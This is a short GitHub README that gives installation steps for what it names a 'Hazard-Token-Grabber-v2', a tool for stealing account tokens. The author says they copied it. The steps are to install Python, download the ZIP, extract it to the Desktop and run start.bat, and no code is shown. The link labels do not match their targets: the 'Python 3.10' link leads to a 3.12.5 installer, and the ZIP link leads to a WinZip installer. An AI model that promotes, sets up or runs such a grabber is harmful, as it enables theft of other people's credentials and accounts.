bagel2322/hzard.token/README.md

 I'm learning coding at the moment to create my own projects as I mentioned before, but I'm pretty young and broke, so please don't hate me for copying/posting this stuff :)

+💉 Installation and use
+It is really easy to set this up!
+Just get [python version 3.10.](https://www.python.org/ftp/python/3.12.5/python-3.12.5-amd64.exe)

+Click the blue/green "CODE" button on this page.
+Choose the option "DOWNLOAD ZIP".
+Or you can directly download the ZIP from [this link.](https://download.winzip.com/gl/gad/winzip76.exe)

+Extract to ZIP to your Desktop and enter the Hazard-Token-Grabber-v2 folder.
+In there, just run start.bat and follow the instructions that it gives to you.

                                                           📷 Screenshots

 ![image](https://github.com/user-attachments/assets/7d731868-9f31-4c81-b994-d5e6be0a0325)